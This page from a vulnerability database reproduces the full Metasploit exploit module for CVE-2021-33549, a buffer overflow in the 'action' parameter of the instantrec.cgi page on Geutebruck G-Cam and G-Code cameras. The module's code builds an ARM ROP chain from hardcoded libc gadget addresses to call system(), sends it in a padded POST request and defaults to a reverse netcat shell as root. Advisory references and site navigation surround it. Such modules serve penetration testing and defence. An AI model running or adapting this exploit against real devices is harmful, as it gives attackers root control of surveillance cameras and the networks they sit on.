Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Geutebruck instantrec Remote Command Execution Exploit

🗓️ 17 Sep 2021 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 270 Views

Geutebruck instantrec Remote Command Execution. Buffer overflow in 'action' parameter of /uapi-cgi/instantrec.cgi. Affected devices: G-Cam EEC-2xxx, G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx with firmware versions 1.12.0.27, 1.12.13.2, 1.12.14.5. Allows root user remote code execution

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2021-33549
16 Sep 202118:25
circl
CNNVD		多款 Geutebrück 摄像头设备缓冲区错误漏洞
27 Jul 202100:00
cnnvd
CVE		CVE-2021-33549
13 Sep 202117:55
cve
Cvelist		CVE-2021-33549 UDP Technology/Geutebrück camera devices: Buffer overflow in action parameter leading to RCE
13 Sep 202117:55
cvelist
ICS		Geutebrück G-Cam E2 and G-Code
27 Jul 202100:00
ics
Malwarebytes		UDP Technology IP Camera firmware vulnerabilities allow for attacker to achieve root
28 Jul 202113:04
malwarebytes
Metasploit		Geutebruck instantrec Remote Command Execution
20 Sep 202117:41
metasploit
NVD		CVE-2021-33549
13 Sep 202118:15
nvd
OSV		CVE-2021-33549
13 Sep 202118:15
osv
Packet Storm		Geutebruck instantrec Remote Command Execution
17 Sep 202100:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Geutebruck instantrec Remote Command Execution',
        'Description' => %q{
          This module exploits a buffer overflow within the 'action'
          parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
          ETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware
          versions 1.12.13.2 and 1.12.14.5.
          Successful exploitation results in remote code execution as the root user.
        },

        'Author' => [
          'Titouan Lazard - RandoriSec', # Discovery
          'Ibrahim Ayadhi - RandoriSec' # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33549'],
          ['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          ['URL', 'http://geutebruck.com'],
          ['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_ARMLE],
        'Targets' => [
          ['Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi'])
      ]
    )
  end

  def write_payload
    # gadgets
    libc_add = 0x402da000
    system_off = 0x00357fc
    libc_data_off = 0x12c960
    str_r1_off = 0x0006781c # str r0 into r4 + 0x14; pop r4 pc;
    pop_r0_off = 0x00101de4 # pop r0 pc
    pop_r1_off = 0x0010252c # pop r1 pc
    pop_r4_off = 0x00015164 # pop r4 pc
    system_ = libc_add + system_off
    str_r1 = libc_add + str_r1_off
    pop_r0 = libc_add + pop_r0_off
    pop_r1 = libc_add + pop_r1_off
    pop_r4 = libc_add + pop_r4_off
    add_str = libc_data_off + libc_add + 4
    chunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*')
    rop = []
    rop += [pop_r4]
    rop += [add_str - 0x14]
    chunks.each_with_index do |chunk, index|
      rop += [pop_r1]
      rop += [chunk]
      rop += [str_r1]
      rop += if index != (chunks.length - 1)
               [add_str - 0x14 + ((index + 1) * 4)]
             else
               [0x41414141]
             end
    end
    rop += [pop_r0]
    rop += [add_str]
    rop += [system_]
    rop.pack('V*')
  end

  def exploit
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    pad_size = 536
    data = Rex::Text.pattern_create(pad_size) + write_payload
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path),
      'vars_post' => {
        'action' => data
      }
    )
    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Sep 2021 00:00Current
1.1Low risk
Vulners AI Score1.1
CVSS 3.17.2
CVSS 26.5
EPSS0.88735
geutebruck instantrec remote command executionbuffer overflow'action' parameteruapi-cgi/instantrec.cgig-cam eec-2xxxg-code ebc-21xxefd-22xxethc-22xxewpc-22xxfirmware versions 1.12.0.271.12.13.21.12.14.5root userremote code execution
270